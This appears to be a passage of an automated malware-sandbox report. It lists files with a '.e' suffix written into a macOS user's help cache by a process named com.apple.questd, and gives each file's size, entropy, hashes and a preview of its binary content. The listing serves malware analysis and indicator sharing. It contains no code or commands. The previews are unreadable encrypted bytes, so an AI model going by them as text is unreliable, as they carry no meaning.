                                                                                                    SHA-256:822C35D7DFCECFC61BBB0517283B49A13E3553ACF003E18ADC298534F4C1A35A
                                                                                                    SHA-512:D6D9D31E5FAF140A856EABF3C262BE1D6346420435D2CF903EE211F78D2B12EA63D4299B4E208F27D76406C1C4B63C657D4FEA2BF61AA25CDB76B265524B907B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...._.....;.jF....K6.!...(.!...s.L......;F.....u4.9....t..x.<.\&,..#....{T2Qh....... .hN...F...N...j...?QdX..._2.Y...bK...N.5.D..6.QZ.f....a...VNi..U.5)F..]i..!..J.X.....*k>....&.......LK$..s..3u.2.....1...../\.......L....v......<.Y.]...0$u..dk..+t....6KkVw....}..^6.$?.r.A..E..:pE.!.M....... ..........O.y.....7.H@...?Z....;h.j..\..v.M..9{.e3.u.P.\2\....j..:...E.9`.8L...t..%..*B.S..a.b'..Qx.5..e.......Y.H....n..SC.%.B......2..&..:^...F[.6F................G.%]......P/.G.FQ........0..Dz.z@{.L^..:.j..:...N...B;d.U....n,....M./../..S....Q......./..S..........-.....F.Diw..'J.u.O.\.nS........e...{j.\?...QC.*..~..=R.>.g.va.Y... %.ii.5....T=.SB$...I....Q.U..].. .@.9...F...=..q.4..@.zBr.`.*...\..B..............T..m.........'sj...Z'... .-$NZ\....te.S.O.........}...8...:....q.h.*........8-~......1..%...9{.e3.u.."..5....0.k.......z...f_@A.U./........;..9.V.).........c.....2z..Jb7+........*.Lm.. c..;....O....P/.G.F..i6.\p.E....z.....2......&..........Gzg........+2).$..ee#...I.G..a...Y......m..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/HelpSDMIndexFile/.com.apple.FaceTime.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):6658
                                                                                                    Entropy (8bit):7.930687103135729
                                                                                                    Encrypted:false
                                                                                                    MD5:3745140D2B3EA7339AD65323F02F660A
                                                                                                    SHA1:E9CE96CF72FBB856D26FA454EBF8CDF3C8842EE7
                                                                                                    SHA-256:1EA19A41829B1207BDB64171E629EBC495C89637525D368247B7A16D5882A930
                                                                                                    SHA-512:788B1443F4B18C18EE32DA174F12205D5097D3D8362CC8AE78DDF46DD5295C8390F974D94A584D7B04EDD8C7DA5B160D7AB2B71EC0FA8AB88DCF1FEA64E0B741
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w......:.....]I...c._j.]$...;!..5..=....q./..{Oe.qn...S.E......}.U........Lt....=..{..%........3..l.@.q........@.3.W...@V....k...l).u...z......[..]..3`.....q..Q=)i..+|+)..1o...s{........%........6>.v'j.z..U..6.%....`..8..|.O_....=.h.CV..^As...,o....aFvR.m...._.....Q........#q.]B..E.h.....Q^.fQ./d@M.f.....#k...n3........f.....A.v..l..<.N.M..j.v.Q..zq.. ...5Y..G.....S.p.....m.E..A....7..:....y.s.....5..8.r....N...h.pU...B7Wx.Bi..D.,qS..A=.0...C.".{N...4....Yqc.N.".u...A...nY.....V...5c(...oH....... .l..").............a{.X...9.\p<ib.Db.ng..T..GpA.....dSIr.`...Oe........T.$2.F...k.f`.e.....%...O..G. %-..\.)..J........E...d......AU5....m*.}WQ.#.......9!....g3y.0...p3..M$.z#.R.&..n../..U..i....a.c^Y.}......L....^.6..}".)..v4n.V.....RjI......`5e...7.%.\$F . .Q8lnx.l.u..tw ..5.).[..BH..V........u......M....g..xm.Z`F5[T.X|.u...W....c..o...Y..=.+.ql..^4...E.w..d.<..8...:....A.e]".U.....%
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/HelpSDMIndexFile/.com.apple.Photos.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):39084
                                                                                                    Entropy (8bit):7.994074315413262
                                                                                                    Encrypted:true
                                                                                                    MD5:2A2C74FF505880401166A70AEA373541
                                                                                                    SHA1:B65C0DD1E19906098C548E686212CF2AB194DB94
                                                                                                    SHA-256:A3B2B71EFAD3F42BB5A6A7086456B3CD6AE8B60EFAEE0161EF6BA3DCF56FDE91
                                                                                                    SHA-512:2DBEEF73B8256688A25A63ADCBFC3F508E0A4376FFABEC291034E767C1B8C385611E8281367631597D95F1A9ABD43190D4B7194CB5A7E61B7ECD9C2CE96C1139
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w.A..c.Y...h...K..].....|W.L.....{ ......(...gN.s.".S...#.Y......../t..LqH.RQ.....9......M..B...c.[)._....g.$......{kqn1.^.t..,..:...~..t.&b4A........3.....aV..R.....`.`....y....R.?..C$G..3/y..8.U*r.yVf........E.M...g..y..9GP.a.\.......oz.dH...U.....ic.U....`..<...2..g..bs.......Q&......&.m..vs.m`....w..!I...N:.....F..*....C.l..Je=.y..K.>.C]$..H.9s=.[...,7........?..I............P\......[..@..w.n. ..........fh...........L........:.V...ep$..........I5..`|..Gq.w).UbZ..D.j.F.......@.......L..+.:..... ..t9./.....,..._`6/)w1....a#..a%...\_S.0._.RK.+.Z.n............B.....W.-..U.z........5..t.. n...8u....:[.k....Sr%.=5.Dn......AD....0.(.....TB"..u......&...n..S...Pl*k...A..`pX..m......o...cCf.......S...0.d......,b@...S.1..`g..t...t...V....].p.4..../d..W../n.F.h(.n..G.....)?-X.s...%J....p.....6.........C.M...*o..W._......./..[....v.P.q(.v)!...H...Lf.T(S..E...z..x=1..-mR.h.3...f.G...3=.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/HelpSDMIndexFile/.com.apple.VoiceOver.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):45268
                                                                                                    Entropy (8bit):7.994720309277309
                                                                                                    Encrypted:true
                                                                                                    MD5:32DF314670264D3CC0CC980645F46E7A
                                                                                                    SHA1:78A1305BBEFDFB0223AF390CEDB98E788080C115
                                                                                                    SHA-256:0996D78C332188EEC82A7A2A78AD2B8EC0D5BF9AF11D501140E462D3992CD47A
                                                                                                    SHA-512:A2FBDEFD43FD623CAC869BADF1C1E2B6517589941D05A65CB984C7CD6D67E433A78C34AAF262195AA527790C2EBF4E3147BC2CC63BD22943C57EBF89855F724B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w...;w....8.1..9.......p]..L.....{7"DDO..&y...(E...9.o..h$I.....WP\..5G$J.......p....~............../.qf%......j..V...{b.wc..../...7.X...axw.V...]............. .(.....)~5X]...S`....xiDI..Ip...B.. .%....L@.lW...T.)....M....,..-......2.%.4.+x.l...e2mJ.J|....8.i./...L.....L.A!.?..:.ZP?.j.Pe..>2.y.y7.r.2U.....@pQ|Y.*g-].....%.....CJK9...K......}`...yw...(.Y..&A"..?\o=f..q..4>..1#...+.........M.C..Q....o'....uh9....d^h....@...U.h.....LF........M...+,M.....2^..C.r|.f.x<e....cb,.....6.L.D<.+..........n....&.........B1F........(.2|7.....I..y.3...8C$......p..kH..A2sw...}?..x..Y18.........\o..b...C%...hcr.V2.DG..8..u.n.....zH..2.f..1..M.........]arCy+.[l..q.j.u....S...Gmg..%GM..]'.c.D..f.M......{hI.6...g?........b...j..\.:.#.U...gx`>3^ASla..$t...k_....a.n*...9...].....r.....&.........E..a=[..;=.`,)...............\.t.g}'..f..rZ/...?..*%.=....*..7.WV.}.?.<=).k..5.AW.<U.fm..6/.}....!.^..0.X
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/HelpSDMIndexFile/.com.apple.colorsyncutility.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):5578
                                                                                                    Entropy (8bit):7.907853680770972
                                                                                                    Encrypted:false
                                                                                                    MD5:FEA20F1D5FBD2A9AF71F67B142C847D0
                                                                                                    SHA1:4370A851743CE185C535067C07E1E9168DA8A3F6
                                                                                                    SHA-256:A06AC675502FF92957A4C04B6FE2DB601DBE6153CFC7823D83F8B322CA3ACB6C
                                                                                                    SHA-512:F93F5B93D759F8CC1F4EF59950D5ADB387F4A3BDDC45DB80EC7E287D9C1E5740840D0463BD1568816BA3D476A7F55EE742AC48880EA0FDDEE25875A479366C98
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w.....<....F.Jd...c._j.]$...;!..5.: =.g.C...pa.Z.j....S..BG.... ...V...BS.)&.P..JX...+...%Db].-.3I+k..].<......o......eK..a..)...T.#]....]![.'F......l~....,#.9\..+..".IF.Q....U..o..1o....!..[...........(...<..((....b-j71.Y..:......}Be...;..oR...Y....^O.g0-t...u............D..xW#.........&..v...........E.Z.....c............N.x.I.I..Q.>V...Tw.?....,...........Yg.HY.=17...:.yk..`at}.'~..m6........^:.Z..t.iJ...cd....n..x...=.&...X.]O..Fx..".T;{@5..<6.g..IK]2W!....ot..m)Q.mk.X.7......W...R......t$$.\.oHc.8....;..<$4.-K....,.DT..=.g.............-..{.J...5J.........."W.`.....m....._......M>........qV\...N...3y.<...guB......8?....U........4jk..d..x....b......M.j.N.+.#.......].yr...SV.Hd...>..=..m..~..o....PQ..W.4..s.,..eRh.H6...../..Hv=...\.r.3........wv2K...QT.R..\7.e<.X<J.#..y.nlDh..q.h.u.......>..%....|./..k.../..Z...z\...XMJ....~..D.0.....!jQ.vH...X..p.w...l....k........ .p*..GI.K.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/HelpSDMIndexFile/.com.apple.gamecenter.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):5162
                                                                                                    Entropy (8bit):7.907216618776736
                                                                                                    Encrypted:false
                                                                                                    MD5:3F06B2398E87A9BD31E7E8F266C6B17B
                                                                                                    SHA1:7F5FDFDD1BC964F4BFD35BBB08927F650D28D0BA
                                                                                                    SHA-256:A313C0F409317530B84F608B151D834210BED1217A9A13E5B78F4E08188EFCCA
                                                                                                    SHA-512:DA52B99FF67FAB348D7D6090E989D243ADCFBE37153628FFDA0B778EE6C689C94515BDE32DA1B285AF81409ABB8BA80217198787BB0F85B6A6677BC907E04FA0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w.O.Ki.....G.J.Z..c._j.]$...;!..5.../u.7q.3.=.a..L.Q{.]C.o7..2...J...!?%........{r)..@5n..m.Fc.$...Ja'...:8.{.J.+\...,.16).W.../.l...[^.L%....t..M.....m.1.&J*VG..7..e[..B.....%.+2:..HD.Y.)......k.z..........>...K..{5..s..G...H...s]..e.....m]c.U...k..Q.d..|.D-7.I.z0$...... .5<.D..1"]k/.....K.6..........g.....8...{.V..S.7..q......I...........=.c..vQ.y..].m....H.....C......{..&.~A.a<....."@r...v.[x...O.V.B>o+.<.`..W=.t.Z........t.,'.>..i...............h....*.\...HG....b..g.Z....+...VP.....w.h.b#..s..3........U..,....*......LN.(...u...bz.v2A.h|G.Y.u...Ou.z.H.y..Y'.*..rDU.dBW..s.d0........Z....d..C...t.....?.-vE.....;.-..\..gC....i...i.....j....$............=.*.... ..*.Y...P....t.L.1G.X5....P.%_..S...AS6a..{..e...<...n7..\.a.TI.Q.(.s...w......^.....t...6.{....h...B.SJ........&o........{G.TP...fO..d..Q".v}....o...j.npm..Z...r.../..$........J.._..!v.b.e;c._...N.{........`......'.s....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/HelpSDMIndexFile/.com.apple.iBooksX.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):9858
                                                                                                    Entropy (8bit):7.955521945398902
                                                                                                    Encrypted:false
                                                                                                    MD5:9F9F39F1CF459DAA7B8D8FFA396C081D
                                                                                                    SHA1:260F9F45CF369051D8029E9692D94802B7C8DBDA
                                                                                                    SHA-256:AA6FB8F10A783A98AE1428DC50EA7E714CF6DF6B93FD17D7372290D3F560EB1C
                                                                                                    SHA-512:07187F748185B0164DAE43CF79447E210AE6135DCB9462F4CE888DF592D1430B7347E072E87EBA83B7AF4161441ED3A8711BC9FEE524AD89C8A07971F87D07B7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w..+w`.....U....S.c._j.]$...;!..5..ta.r..h.m..t-.n..2T.'.......P^.....C?FtV.:..d....p..c!..].......WP.M..%.c.e....K...fJ<eG.PP.zU.....4.........^R#...f.o.:.U..!*jS3FH.$4c.U@.j......1........J8c......S.`.......+w...M....CJ......p..Q....G....{.Yu.\...1K..>........[.GQ.....>.p..T.._.)...]+.S..............j.u{D...4..E......~F.h..3].....<.M$...WLI... "-........%..k1;...j...EK..^+;.Z..1......L.....CO..[.].P..!.....2P....c.o...&.Y<..n.v.Nb.-T.......Ff...<....L3.@..%.~..."6....S..N.b...MHL.....]....|.`gR....x..DV.]..>.g:......A.>H@..f.(.tR..........s_.3..1..2....].+=X.b.z.cn..X..zy/.|....i.KP..J..,+....+.@....c..r.............bP.....~...Oy$."...y..:.,1.Et75..G..O.SO..R.O.A.._\.:......\.+.f..P.f.{.9B..............^).rU8...k.Z7.:m.....A.2 .0%./L...9.$...i`.._....~D.....KkQ.........r.yPV#....F.B.u^.;*..zv.}...p.I_1.7......b6B.........NO.tOK..G.....B..V;....A#Q\*.R....j....B....._,.LBH.O..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/HelpSDMIndexFile/.com.apple.keychainaccess.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):9794
                                                                                                    Entropy (8bit):7.961086115096026
                                                                                                    Encrypted:false
                                                                                                    MD5:B0BC12F718535FEC38017C2D72C55A11
                                                                                                    SHA1:7F0BB7EB63045B5BD8760A3AC97227A81097417A
                                                                                                    SHA-256:DF826D6C58BAF768AD33CDCF9FEC0C04678C5D0A5DF24934684E3A9C8BB45D06
                                                                                                    SHA-512:CA7B1E5F8B95851A0A7AD7D9D1BCFBCCC3EEE30D8F15D57EC093ED70904653AB1EED92F28EC5D2AB80177431274CC7FF646010A20D5760C818FF8891516FE420
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w..\]...S.+...l.d.c._j.]$...;!..5.....f%Go...h..P..z>Y.......k..K.t.9/.......{.....nB....l.8....]gg.N.....x.j.?...0=b}....f.f.e...8.A.A.@A.t..p.N.Z......V.&.NkQ......."A..Q...)l.4B<..(.!..W..:.XVLw..?..?.........T.......}0+Q....'......\.E`...n.4.Y]...~..9'.;0.I.W8.......AA..E0.. .t...4.8....*....x.oG...t4..g..x[..1.....;9.BN......As..m.^..Q.G3.E.;.w.V..R.....X.V...1g.o.;.Nl9.. Yt8......N<.R,..o..<p.5.....6.l{uyJ..~.CA..C.W.,........]...G..O.....g.Fd.4..+.....Y5.=...E..j..,..m...6........-.f3._m.2Q.f....0.......lg.......8.4:"..J......a09..c..!.b.M.8i.Z.............z....mK-...Zg..b.;....m..`..[.*.7.v+...M....._...W.B]".r.i.........cnqT>.u......|....Q......u..i..*|+}.i.^.F.c.Mv..<2S..LE..}...?..N.....j..^./T.......|..).*.G)a......a~...y.R....P....9...#..D..E....m....n<....P........H+./'@...5...%G......T..`...z.f(..2....6<....ZLM....o.....}M.T..GmB...........\..2[.i..|.3:..$c'..o..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/HelpSDMIndexFile/.com.apple.machelp.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):242672
                                                                                                    Entropy (8bit):7.999173933051666
                                                                                                    Encrypted:true
                                                                                                    MD5:8CC12057DFA8FFFB0FBB0F99C89F0918
                                                                                                    SHA1:BF603729E2BBB5FF564A413724E8ACF2C6C7ABB6
                                                                                                    SHA-256:14ADD648CB7A1D919FAE2462B176C0D38B64D576CF8724AD2AFD590F1A58585B
                                                                                                    SHA-512:B4F306EBB22D20D4B4A2CCC9A8BC6454C1A19DFFE9E10DC6E4AA6050D342E921901A7E4673F0DC34BAEAC1E8D433AFB2B42621A72BA9920D12B2D16C1954123E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w..z.=..-{uP.......|AH.E$.....1..&........ya,...k`.9.o..h$.9.o..h$.C>..1&..".....t.{.g.....i.../h..!......B...........).........$G...cY...y....t3..~..p>yi......Tb....`. .q...;}(....^....9N..;.JT....EZ.J.....T..r...mD`d..1....Y...|x.u.G.m>".....7p.Q.<.....,......o-...>A...j....].o.Hw...................W.2.....".W.<a.-2k. ...0.s.Ekv&;x.u......2...B..1.....v.....z.N.....*D.....|...x.w6JGh..wT.IG....r..[?..$...U..nx..!............0.V.Z.R........7.X.gF-..C.V..C..b.8".0G.|..j...v+.2..>..............}........{.3==O..b.....C;..........*...{..c.{...5...0.?......U..|...y.h....E....&...w.h;5d...|.G.g`M0[j...fC........=.............H}..l6.X&.R......1..F..o.n<..6.._..k..{VU.(....^........Y....K)lV.aK...J......%..!...*V.*.....rF^'.......*l..,........K...=...3"......@.V....vy|....4.......ft=.j.].am.i..Pd^S.C~X&c.M.......C...I.h...H.i.H...t:....Ms.P+.5.v..y..d...U...n=.6c.p.]3V%.....r..5.z....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/lsm_map
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):14460
                                                                                                    Entropy (8bit):7.975710519665558
                                                                                                    Encrypted:false
                                                                                                    MD5:A5FB767347DA64528DDAFEAB51D6A5E5
                                                                                                    SHA1:01F56775DF5176E398357CCF2003FECC802E718A
                                                                                                    SHA-256:A2A50772E701A63BD232EB5F7E3ABBE8DAB11A166EFF886B559C14496ECC199B
                                                                                                    SHA-512:727624BF0982F5D48EA43097A5CE23BB4873A2DC8194464FE5431E5F50296BB1B8F1B3E7D9F344621EA47D55E9FFFCB446E7B74F1068D60C3C53F0B631C65AF5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: E....m.a+L...86......z.(b........N..(...l.g....}.7.A.r..2.......p........~jJN.S..'.m.).}....H.........c y.2.j...?....4v....N."/Jx~..........-8...@U...8p.4......#<#.>..#.......5..:.-lA./o.o..U>.~.Z9d..fV..$....~.4PE]P.x...Q.M..G....ih<}.Ek..QI..m.."......i...5..C...Z..]~S.....i.H..QE..z....-.......<..IS...lz.W&.q4.Q.).d....C..U... Q.........v...IFt..x.wU.......C..q.g..j'"...u......`.*.\w..j...Q........b.=.l.q..e...^.:@wi^Tq...u.^.'3.l.Zh.q.v.L.......b8...@h6$.....=..G.o.....W......?> .g.&@.U.K.3.0H..>F.....~Db.vT`..j...rA......Wd.P\B.......?..y.w...R..........pB......"..o?..-0."!.||.!;...J.u.C..7.>9E..G._..W}j.....*..c_,....;....=.2).........................._3,.zQ..8...S...s..Y"..b{.~.OL..;.{.....@.%LV.9.U.....rJ.V..U*)......9.$....9e.h%.v....0....nHh3.Do......0z..QF.....n#S6Ia(.!.Y..9.Ue.u.t.....v..y....kW9"k.4............"*.......hc.em'o5%.:.S......+..M..o..(..l...0q_...N.......@..\..*.....i...v7.a..2...(@.p......]...E...GA...7o.N...G.d....j..Y..7...........*1.B^..... <7.|f..~...C.w*
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.017A6FDF-0959-413E-9AE0-DB4D5AB7538A.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):16194
                                                                                                    Entropy (8bit):7.962292319568671
                                                                                                    Encrypted:false
                                                                                                    MD5:261B74F9272712ED71D687CD3D7FEA4E
                                                                                                    SHA1:3E54FCBB285EBF94E9709C7D75CE8554241366ED
                                                                                                    SHA-256:A8B77883805A87222FBAE2802FCC80D604715C7382C93D8CCA3A3CEC28C2390C
                                                                                                    SHA-512:A9578809BE39A7B916CE06F73BEC298AE54F786BF28A988688C0DC5B2B4E9FFD27ED8401F9A3BC8DECEA5EF7C2F5C6E75CE6783CE1ED75400D5B5DEA3A4E722F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0...y......f_.+...s.Lf.ii..-.G..AR...~......6.....3(Q...=R.erZ.F..w.....X..pe...I...u....-..q.:....1..KkT..8m!..8^......W>...#3...x..x _K'N..h)..""..~?.a.?'............u4......RB..A.p.....O.L..r.TP.e\....FA(p.J.....t.0]...,"[............~.H.V.....g.F..Z..i6....e.]...w..@>C+...z.T......$.&..h..#.F..>.u..d..^>.-.-T.5D>,.....h%...D....."......P4....{.v..IF.h..Jo.6"..1<.......3.......*v.(w/....nb+`..e..."H.:....... .&..c..g...?.....;...}..Xn'...Z.@..n....8.^)...L......}..6.............w y..[.....|.......>q.......s......3......0...-M.g1.+.np....M..J......T}..Nv..6.....34.].........Z.p..|o..1j.2..8>....Yl....p..e.o...A8...8*.....5.M.p.K.O8./..&A......d;8...(.j1~.....B1..VL........b..Qz..=n.....f7tf..*.R.\-..Q>^...*.........A..(...$.&..s.(O..Cb.y[M2i..^>.-.-T..p..nf5WW.....M.w8..{...SW}wRP.Z.T.o.....g./~.q.....;.i.....X..j./.4.. .....`.jy....04.j.%V...P,h.!.......e.T.....7@3f.x|eh.........N'Y........)i.....8z(.o.B..!.~qL..Ju".I..w..O.$.7.a()...r.......3:+.....6O..1>......
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.021865E7-27E1-4BF1-89CB-0FD08E15A2B7.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:Dyalog APL version 208 .173
                                                                                                    Size (bytes):9794
                                                                                                    Entropy (8bit):7.9572221065965705
                                                                                                    Encrypted:false
                                                                                                    MD5:DA17EF137FA51F8343B4E9FFF2C78EF5
                                                                                                    SHA1:AE568B31D7E27ECD9E3C8A3C855DDAB5F23B639A
                                                                                                    SHA-256:A99452D7230EDC6AF789198A8C87F01D7283DB6D5278D5653A67075BC86D2789
                                                                                                    SHA-512:B9CAB1B373A4BB26D142A1FA597B296E706D89FD1777412EF4FC8F067587BAD82300843822A11CC7C8FDB1F6425DA649C7AF17F65D6AF010F720F4BDE5E9048E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....5...(..\....?.,.,...e....w7......0.;......I&....a...E..bs.......d.P...~..~>..Q.f........WL...wk..v...C.B..Z\C7...Q].....o....z....jtf..w.%k.D-9.'.<c......3...{.....n..G...=.|&W..vnt......A.......8.c...q..&.....}....Wu...!..~../..x..f.s..v........M............<H`kf....n......K..L.......ETH..s_:.....4hG.....yh._.:...`(....d~...'...D.VO.xU..z..sX........,....b..Lx..eJ9...F...^.........VW....US ...%}..YJQ.-.-.bA.V...^.c\.3..&7....p...+..8n.B.]..t......2.#(b...V....y.2..'9..o>...q..\.. W......dpH..l...tV.:......^2?.[.X.b&......li.C&....e..........^.:......FgNy.c..n.~...H....H.8#R.....7....S+*f....C.h\..t.z...q.2,,zG\1.q....a...."..@..N.|.fP........{......H.[.......D..\...........=.....z.kJ... H$..;..j.....&..a...P...P/..Y^h.:....B..`BG7..@......)uz...6...=yl+..'..>rZ./#.....4.~B......1........i../.OT..V..a........~.%..1Z.H.....(..^...XU.Tz....Ksf..'p.xMM%.Y.Y..0.D+.L.<`.q.....Vy7.....\..<`.....:..k.pj.).>...y?.}ua.......E.9.$...9..Mz\.../!y..........E6..g.j..O.e...=........*...E~...t..h
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.0291C6FC-F027-42D2-9884-CF0C6DC2845D.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):99608
                                                                                                    Entropy (8bit):7.997963677910531
                                                                                                    Encrypted:true
                                                                                                    MD5:A7B1CED4F6FD71C338CBA5CEDA5A29EB
                                                                                                    SHA1:62FF1BDECC2168EB697C80C8C1A3ADDE9A6DA022
                                                                                                    SHA-256:48BF4FF0C3799EEEEB573C763E2E3A6B50D9E8E5D1C73E3EB861C6AF3661BEDA
                                                                                                    SHA-512:23DFED4825C1D07FA553667942184154B56CF4E24BF69C4CAB54E121DD7FC7204FE21098B3C1DB14374AD3FB5A678A492A931A52EF748FF020E15258EB6AC81B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....O.m..|...n..`...J"..e..D\..t.z..c .4..%..........*..q&..".]XZ.F..]...$.p.>.. .l.I...d..m..n5....:.....5.8w......c...P.....XH.Z.>.:N....X.c.z.A.....-....:."V.....$_....7.f........8[.h./.......}h...8......~2W.P..........S .m......Dw..........)sce+.W.'.Xp..6V.d.%........#....._...-M/.../^....."....rw........W.r......-.....&YQ...v.:Og.....7 .)..V.,..7@.'Z.X....z..)./..n)^7HK.....,.....oB..\tQ.[N....s.t7.....c4'^("..... Q_%{...._.H....9....c.0.Y$..&....A..W.p..={-.AFyO.!V.;..g3....1..W}D....].O..o...G*....K..B ...v..:Du..v'C..T... ..O].......(......(..TI9.u.........N.x8....^..>N^M.k...TN......\.w$XK<..h...o40..'..W....}.....].4....o. .?.).......`.5.@...AI..M.~.\..qN.=..}l.g4.(}r.....*.p.:.....qw.)M.n.}36.5...h.;5iu..#..... kD......b...K..a........[q...^...=_`......2C].~+...*B...Y.....9..)...~[L.)........O.u..(.='].b&M*.....[r.X.^.y....G...cv6!..'.&o.h.....v........b.......s.E...f)..8..`..Ss....AQ9.-..<.(..&.Y......W.O...o..j...Q;......=.~.^/{2.AIR-....KM?..o=F....U....U.O>.........p..,f
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.05117F4B-14AF-45CF-83EF-CF99B5DCF68D.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):13794
                                                                                                    Entropy (8bit):7.9506369731620605
                                                                                                    Encrypted:false
                                                                                                    MD5:D7779634FB0DD6B953B582D6F42E9B76
                                                                                                    SHA1:1F4D36B1C7E3A9FC955E3D13F1C3A7B25A186474
                                                                                                    SHA-256:252D16CBEB2EF681A73B3D44D7B7EC76A72D9436D297EBA2B6D673CF5E8132AE
                                                                                                    SHA-512:91BF4878EE81789D09762A3009C4851584DF745EF02A3B2EB4203E3540ABC07ADFA8B7FF139F3C5784DB0811D125782F45B3348FA42B78A2BA21BACF81A7B4DA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0..s.f.n..#A.[V..S..A.....&.\..ma.(.!.GI....6.....3(Q...=R.....mL..V.D.(......Y....m.I.0.....8.f.JE.!P..n...)./LV......co8..S...I.C.|o..1j..........'.9.Jm..J..m...r.4U2...sS....)t....H.>.`T..=W|...~..Y{...=..........CY<..hRh9...j@[?SXx.H.q..V..'V..../l.9u.>....c.A.k.%...?\c.P...x....6......w..qT~I..*......5q.."q.s..o.vNV2....2..y......~.S?b@..nP...P4....{.v..IF.h..Jo.6"..1<.......3.......*v.(w/....nb..s.d.#<.v1..U.%."..f.".fz.2..H......;...}..Xn'...Z.@..n....8.^)...L....l'4.............!.zM=...[.....|.......>q.......sY@.....8'K...Me..-M.g1.+....a.}...N..UFfo.e_.w...m...l...1.....l....Z.p..|o..1j.........~%.......T..:Y/.Lz...6-..r...u:@.W{....g...i.E.d.).PBe..;..2xB.2.C..Wm...J\>w.....P.}....2w...z...#...Vh1.?z^..B.)?/1.........=4S...Y..<1..m......r...j.. ..d@.k......V. sQ.6[.cn>.wm..}..gU......@....zM.......<..g5......Koy.,.t.|....N.~...8...on"...'0cx.DM...C...w.~..-.q........W`Y..y$.=......X.aBi.p...B..`c.8..i...B.nE..\....f...0}o.........C&.......$:.".p....L.....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.07A13199-147E-4CBA-B834-186DB22E2B55.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):34284
                                                                                                    Entropy (8bit):7.991189812189743
                                                                                                    Encrypted:true
                                                                                                    MD5:95900BED2257DB21BA8F88A679240326
                                                                                                    SHA1:56C88D504CC6E23554D99F19B197873CB0F20480
                                                                                                    SHA-256:730C7CD39DEF990A13172B31E9E794643A0B159512A92B0BE4D4D5C88FA4E637
